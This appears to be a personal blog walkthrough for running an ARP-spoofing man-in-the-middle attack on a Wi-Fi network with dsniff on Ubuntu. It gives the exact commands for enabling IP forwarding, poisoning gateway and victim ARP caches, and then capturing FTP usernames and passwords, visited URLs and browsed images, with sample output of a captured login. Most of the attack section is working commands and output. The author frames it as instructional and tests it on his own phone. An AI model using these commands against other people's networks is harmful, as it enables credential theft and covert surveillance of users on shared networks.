MITM Using dniff on Ubuntu

anirbanb2004

This blog is just for instructional purpose to show how to set up dsniff package on Ubuntu for MITM attack using ARPSpoof.

My UBUNTU version Ubuntu 18.04.3 LTS

anirbanb2004@Anisoft-Corporation:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.3 LTS
Release: 18.04
Codename: bionic
anirbanb2004@Anisoft-Corporation:~$

  1. Lets run an update so that the repository gets updated with all latest libraries that are already installed. sudo apt-get update this command will take quite some time to complete updating all the installed libraries to their latest versions.
  2. lets install dnsiff package now. sudo apt install dsniff
  3. Once the above installation is completed validate the installation was successful, run test commands like below
    • sudo arpspoof
      • The output should say

Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

4. Before starting MITM we must enable IP forwarding on our machine so that the traffic to/from Victim / router gets propagated further from our laptop. sudo echo 1 > /proc/sys/net/ipv4/ip_forward

This step is very important, else Traffic will flow from Victim to Our machine which are targeted for Gateway but will never make its way to gateway, similarly the responses from Gateway will reach our machine but will never make its way to Victim’s browser again.

5. Get the router/gateway’s IP address by executing the command “sudo arp -a”

anirbanb2004@Anisoft-Corporation:~$ sudo arp -a
_gateway (192.168.0.1) at 58:19:f8:f0:51:10 [ether] on wlan0

Here : 192.168.0.1 is the IP for the Router Gateway

wlan0 : Is the network interface ( we will be needing it little later)

6.Choose a victim’s IP, here I choose my samsung Note Phone which is connected to same AP in the Same Wifi. from Phone’s Wifi setting I got the ip is “192.168.0.126″

7. ARP Poison Traffic from Victim’s IP to gateway IP

sudo arpspoof -t 192.168.0.1 192.168.0.126

You will see lines appearing like below, let this terminal open and running

anirbanb2004@Anisoft-Corporation:~$ sudo arpspoof -t 192.168.0.1 192.168.0.126
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28

8. Open another Terminal and now ARP poison traffics from Gateway IP to Victim’s IP

sudo arpspoof -t 192.168.0.126 192.168.0.1

In this terminal you will see lines like below appearing, let this terminal also continue and don’t close it

68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28

9. Your MITM atatck is successful, now your Laptop is sitting in between Victim and Gateway for all non secured traffics. Now lets intercept some of them

Sniffing Passwords

10. Open a new terminal and type command : sudo dsniff -i wlan0 -m

Here wlan0 is the network interface we found from command “arp -a”

It will say “dsniff: listening on wlan0”

11.Now on my mobile that is the Victim’s device here lets perform an ftp login.

FTP is a very critical operation “File Transfer Protocol” , to access and manage file System on a server

on mobile browser access “ftp://anisoftcorporation.com”

It will prompt for login user name and password.

Give some username and some password and click on Sign In

12. On the terminal on Laptop where you Ran dniff command you will see your username and password that you entered on mobile browser will appear as below

11/17/19 23:27:29 tcp 192.168.0.126.37314 -> lnx36.securehostdns.com.21 (ftp)
USER adminuser
PASS funnycode

Sniffing URLs visited

13. Open another terminal and execute the command “sudo urlsnarf -i wlan0”

It should show output like below,

urlsnarf: listening on wlan0 [tcp port 80 or port 8080 or port 3128]

14. On Victim’s device, here on my mobile I opened http://azsamhita.org/wp

On the terminal where you were running urlsnarf command, you will see the below output started coming ( The repeatation are beause it is loading each of the websites components, JS files, CSS files, images)

192.168.0.126 – – [17/Nov/2019:23:32:53 -0700] “GET http://azsamhita.org/wp/wp-includes/css/dist/block-library/style.min.css?ver=5.0.7 HTTP/1.1” – – “http://azsamhita.org/wp/” “Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36”
192.168.0.126 – – [17/Nov/2019:23:32:58 -0700] “GET http://azsamhita.org/wp/wp-content/plugins/widget-countdown/includes/gutenberg/style.css?ver=5.0.7 HTTP/1.1” – – “http://azsamhita.org/wp/” “Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36”
192.168.0.126 – – [17/Nov/2019:23:33:05 -0700] “GET http://azsamhita.org/wp/wp-content/plugins/jetpack/modules/shortcodes/css/jetpack-email-subscribe.css?ver=1.0 HTTP/1.1” – – “http://azsamhita.org/wp/” “Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36”
192.168.0.126 – – [17/Nov/2019:23:33:11 -0700] “GET http://azsamhita.org/wp/wp-content/plugins/buddypress/bp-activity/css/mentions.min.css?ver=4.1.0 HTTP/1.1” – – “http://azsamhita.org/wp/” “Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36”

15. On mobile now open “http://anisoftcorpotaion.com”,

On your Terminal you will see

192.168.0.126 – – [17/Nov/2019:23:35:46 -0700] “GET http://anisoftcorporation.com/ HTTP/1.1” – – “-” “Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36”

If you notice this output you will see it has not only the URL the victim is visiting, also it has the device information, browser information “Mozilla/5.0 (Linux; Android 9; SM-N950U)” – The scary part it is revealing it is Android 9 OS and Samsung Note 5 🙂

Sniffing Images Browsed

16. Need to install one more package called “driftnet” Install with command

sudo apt-get install driftnet

17. With the arp poising terminal running , open another terminal and execute driftnet as “driftnet”

28. It ill open a popup terminal

29. on mobile device open a new tab in incognito mode and open “http://azsamhita.org”

You will see all the images starting from site logo are loading into that pop up.

After we establish ourself in the Middle of the traffic flow between Gateway and Victim, what we did above are just Observed the traffic. There are more we can do. I will have another post that will start from here. DNSSPOOF

But before that lets see if there is a way to know if I am Under MITIM attack. Follow this POST “Tracking MITIM”

Please follow and like us:
RSS
Follow by Email
Facebook
fb-share-icon
Twitter
Tweet
Pinterest
Pin Share
LinkedIn
Share

Written by 

Leave a Reply